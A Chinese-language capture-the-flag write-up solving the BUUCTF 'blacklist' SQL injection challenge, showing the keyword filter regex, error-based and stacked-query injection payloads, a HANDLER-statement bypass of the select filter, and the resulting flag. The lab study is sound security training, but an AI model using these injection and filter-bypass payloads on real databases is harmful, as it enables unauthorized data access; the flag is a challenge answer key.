buuctf blacklist
生活随笔
收集整理的這篇文章主要介紹了
buuctf blacklist
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
這是一道sql注入題目,我們先來嘗試對它進行閉合,payload:1'
使用聯合查詢,構造payload:
?inject=1' union select 1,2--+過濾了許多東西:
/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i其中的select被過濾掉了
嘗試使用報錯注入進行突破:
?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+?得到數據庫:supersqli
由于過濾掉了insert和delete,我們無法使用報錯注入,嘗試使用堆疊注入進行突破
?inject=-1';use supersqli;show tables--+發現了兩個表,猜測flag在flaghere里面,接下來查字段
?inject=-1';use supersqli;show columns from FlagHere--+看到了字段flag
用handle讀取
這里的handle語句和select查詢語句都可以在mysql中查詢想要的東西
基本語句是
通過HANDLER tbl_name OPEN打開一張表,無返回結果。
通過HANDLER tbl_name READ FIRST獲取tbl_name的第一行,通過READ NEXT依次獲取其它行。最后一行執行之后再執行NEXT會返回一個空的結果。
通過HANDLER tbl_name CLOSE來關閉打開的tbl_name。
?
?inject=1';handler FlagHere open;handler FlagHere read first--+
flag{0e61116e-dd99-49ec-ba01-5537cec1a996}總結
以上是生活随笔為你收集整理的buuctf blacklist的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 那些逝去的岁月-性格分析
- 下一篇: DHCP,DNS,以及网关的意思和存在意